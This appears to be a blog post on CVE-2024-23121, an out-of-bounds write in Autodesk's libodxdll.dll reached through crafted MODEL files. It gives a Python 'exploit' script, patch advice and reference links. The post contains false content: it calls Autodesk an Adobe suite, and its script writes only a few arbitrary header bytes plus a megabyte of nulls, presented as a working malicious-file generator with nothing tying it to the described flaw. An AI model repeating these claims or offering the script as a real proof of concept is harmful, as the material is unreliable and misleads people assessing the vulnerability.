CVE-2024-23121 - Exploiting Autodesk Applications through Out-of-Bounds Write in libodxdll.dll using Malicious MODEL Files

Adobe's popular Autodesk suite, known for its powerful 3D design capabilities, is often used by engineers, architects, and specialists alike. However, like any complex software, it sometimes has underlying security vulnerabilities that could be exploited by malicious actors. A recent vulnerability, dubbed CVE-2024-23121, has emerged in Autodesk applications, posing potential risks to users. When exploited, this vulnerability can trigger an Out-of-Bounds Write by parsing specially crafted MODEL files with libodxdll.dll.

In this post, we will dissect the details of CVE-2024-23121, examine its potential impact, and provide the necessary resources to protect against this threat. We will break down the exploit in simple terms and present code snippets and helpful links for a thorough understanding of the situation.

Exploit Details

At the heart of the CVE-2024-23121 vulnerability lies an issue in libodxdll.dll, a crucial library component in Autodesk applications. When parsing a maliciously crafted MODEL file, the affected library may force an Out-of-Bounds Write, which could be exploited by an attacker.

To successfully leverage this vulnerability for nefarious purposes, a threat actor would need to craft a malicious MODEL file. This file would contain specific parameters that would force libodxdll.dll to trigger an Out-of-Bounds Write while parsing the file. Once this occurs, the attacker could crash the application, read sensitive data, or execute arbitrary code within the context of the running process.

Code Snippet

The following Python script demonstrates the creation of a malicious MODEL file. This script generates a file that, when parsed by an Autodesk application with the libodxdll.dll vulnerability, may trigger the Out-of-Bounds Write condition:

#!/usr/bin/env python3

# CVE-2024-23121 - Malicious MODEL File Creator
# Usage: python3 exploit.py [output_filename]

import sys

def create_malicious_model_file(output_filename):
    header_data = b'\x89\x42\x4A\x46\x4B\x48\x89\xD2\xFE'
    payload_data = b'\x00' * (1024 * 1024)  # 1MB of NULL bytes

    with open(output_filename, 'wb') as output_file:
        output_file.write(header_data)
        output_file.write(payload_data)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py [output_filename]")
        sys.exit(1)
    output_filename = sys.argv[1]
    create_malicious_model_file(output_filename)

Original References

- Official CVE Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23121
- Autodesk Security Advisory: https://www.autodesk.com/trust/security-advisories/adsk-security-advisory-cve-2024-23121

Mitigation and Protection

To protect against this vulnerability, users should make sure that they are using the latest available version of Autodesk applications. Autodesk has released patches to address the issue in affected products. More information on updating your software can be found on the Autodesk website at https://knowledge.autodesk.com/search-result/caas/simple-content/item1/ENU/Support/files/Updaters-and-Patches.html

In addition to updating your Autodesk applications, it's essential to practice safe computing habits, such as avoiding opening files from untrusted sources and ensuring that your operating system and other applications are up-to-date.

Conclusion

CVE-2024-23121 is a critical vulnerability that, if exploited, can have severe consequences for its victims. By understanding the exploit, its potential impact, and proper mitigation techniques, users of Autodesk products can protect themselves from this threat and ensure the continued security of their valuable work.

Timeline

Published on: 02/22/2024 02:15:49 UTC
Last modified on: 08/01/2024 13:47:05 UTC